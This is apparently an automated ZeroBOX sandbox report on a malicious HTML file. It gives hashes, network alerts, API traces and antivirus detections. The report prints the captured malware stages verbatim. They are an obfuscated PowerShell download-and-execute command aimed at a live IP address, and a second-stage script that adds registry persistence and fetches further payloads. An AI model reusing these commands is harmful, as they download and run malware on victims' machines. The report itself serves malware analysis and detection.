popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Encoding.html

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x3201 March 27, 2021, 11:33 a.m. March 27, 2021, 11:35 a.m.
Size 547.0B
Type HTML document, ASCII text, with CRLF line terminators
MD5 d7bb6b9d1cd02209f89dc0c4759ddd87
SHA256 641bd546e893a40bbfa95f2658c1e2099c47d14d8281b0ba44647c75fe8783ca
CRC32 1EC2B44C
ssdeep 12:M6Qclfh3D5LWMjMcqahRDTEdrNNZh2K1wztaSrBYMSeW:Msp1CMjLqav8Zj1wnFYMdW
Yara None matched

Name Response Post-Analysis Lookup
ia801407.us.archive.org
A 207.241.228.147
207.241.228.147
IP Address Status Action
164.124.101.2 Active Moloch
198.251.72.110 Active Moloch
207.241.228.147 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49606 -> 207.241.228.147:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 198.251.72.110:80 -> 192.168.56.103:49608 2018856 ET MALWARE Windows executable base64 encoded A Network Trojan was detected
TCP 198.251.72.110:80 -> 192.168.56.103:49608 2029538 ET HUNTING EXE Base64 Encoded potential malware Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49606
207.241.228.147:443 		C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 OU=Domain Control Validated, CN=*.us.archive.org 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameA

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0

GetComputerNameA

 computer_name: WIN7-PC
1 1 0

GetComputerNameW

 computer_name: WIN7-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: "2"개의 인수가 있는 "DownloadFile"을(를) 호출하는 동안 예외가 발생했습니다. "기
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: 본 연결이 닫혔습니다. SSL/TLS 보안 채널에 대한 트러스트 관계를 설정할 수 없습니
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: 다."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: 위치 줄:14 문자:72
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ('https://ia801407.us.archive.org/33/items/vbs_20210313/vbs.txt', $p + 'Run.vbs
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: PS C:\Users\Administrator\Desktop>
console_handle: 0x00000077
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042d870
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dd30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042de30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042ddb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.251.72.110/ALL.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.251.72.110/Server.txt
request GET http://www.bing.com/favicon.ico
request GET http://198.251.72.110/ALL.txt
request GET http://198.251.72.110/Server.txt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 6532
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x5fff0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761e3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74ac3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74b67000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x772a9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76122000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761ce000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72322000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 6532
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02420000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x5fff0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761e3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74ac3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74b67000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x772a9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76122000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761ce000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4168
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x5fff0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7621e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761e3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7620d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74ac3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74b67000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x772a9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76122000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761ce000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x77009000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761ce000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x761ca000
process_handle: 0xffffffff
1 0 0
file C:\Users\Public\Microsoft.ps1
file C:\Users\Administrator\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
cmdline Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
filepath: Powershell
1 1 0
Symantec ISB.Downloader!gen76
Kaspersky HEUR:Trojan.Script.Generic
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Sat, 27 Mar 2021 02:33:48 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Thu, 25 Mar 2021 16:21:40 GMT ETag: "52b-5be5ecf73b182" Accept-Ranges: bytes Content-Length: 1323 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain [system.io.directory]::CreateDirectory("C@@$%#@$%#@$%#@$%#$@%#@$%#@$%#Run".Replace("@@$%#@$%#@$%#@$%#$@%#@$%#@$%#",":\Users\Public\")) start-sleep -s 5 Set-ItemProperty -Path "HK*************************orer\User Shell Folders".Replace("*************************","CU:\Software\Microsoft\Windows\CurrentVersion\Expl") -Name "Run" -Value "C:\&&&&&&&&&&&&&un".Replace("&&&&&&&&&&&&&","Users\Public\R"); Set-ItemProperty -Path "HKCU:\Soft<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<lders".Replace("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<","ware\Microsoft\Windows\CurrentVersion\Explorer\Shell Fo") -Name "Run" -Value "C:\Us>>>>>>>>>>>>un".Replace(">>>>>>>>>>>>","ers\Public\R"); start-sleep -s 5 Function HBankers { $p = 'C:\Us<<<<<<<<<<<>>>>>>>>>>>>>>>n\'.Replace("<<<<<<<<<<<>>>>>>>>>>>>>>>","ers\Public\Ru") $ps1 = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu") start-sleep -s 5 if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ia801407.us.archive.org/33/items/vbs_20210313/vbs.txt', $p + 'Run.vbs')){ } start-sleep -s 5 if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('http://198.251.72.110/Server.txt', $ps1 + 'Microsoft.ps1')){ } start-sleep -s 7 powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\Microsoft.ps1" } IEX HBankers
Data received =
Data received 9Kê‡àlHúvrNçß8VÁézœs½dDOWNGRDÀÿ 
Data received )
Data received %"½0‚¹0‚¡ ÚSO¨OÕ0  *†H†÷  0´1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U $http://certs.godaddy.com/repository/1301U*Go Daddy Secure Certificate Authority - G20 191223131632Z 220221225617Z0>1!0U Domain Control Validated10U *.us.archive.org0‚"0  *†H†÷ ‚0‚ ‚É=€(³'o X/æ2Bõ5Õ-À¸; _öET³¿~§™ò¯ÆÞàX╹D×óÛôÿof@ µùµ¾ÔB‚¿Åyú÷ށ™» -¬ì#’Z˜"dÂi—¹s#ô®ÊËÎ>¦Rg½àɂK‘Œù^TN€îrå u•ÓàÛA‚»ºCõ r`f@Qi€?³§Þq*æòjœÝ‚ó ¡qÞ8'†…|ʋ²KI¢ † ˆ¿yÿ)Ãɾ÷\’>_ݶuGí•…C w²e¡ŠÇ¥‡oߢ°Rˆnz͝Ã0ßY›ã“~µŠôJ«oÚK€îCÎÏXê{£‚B0‚>0 Uÿ00U%0++0Uÿ 08U10/0- + )†'http://crl.godaddy.com/gdig2s1-1597.crl0]U V0T0H `†H†ým0907++http://certificates.godaddy.com/repository/0g 0v+j0h0$+0†http://ocsp.godaddy.com/0@+0†4http://certificates.godaddy.com/repository/gdig2.crt0U#0€@½'ŽÌ4ƒ0¢3×ûl³ð´,€Î0+U$0"‚*.us.archive.org‚us.archive.org0UÑn»ØÙ}èÊSõ™³G3Ú Qå0‚ +Öy‚o‚kiv¤¹ ´X‡»¢Ìgp <5˜ù߸ãwÍÈ Üo2æù¢G0E ^ߏ:•D¯Ìø.”*»Å†ð¾c„ fÛ%à’…{å‹!¤Ãõ_Íë!Ƹœ¯•_Ö´¬Í‚ègӵϬôÉvîK½·uÎ`ºáBi«ážf£~_°r؃Ä{‰z¨ýËo2æþYG0E %µ)ùùÃäǨÂՖÌÝ,x±¼Pâ:Z³n'0¦!èÁ 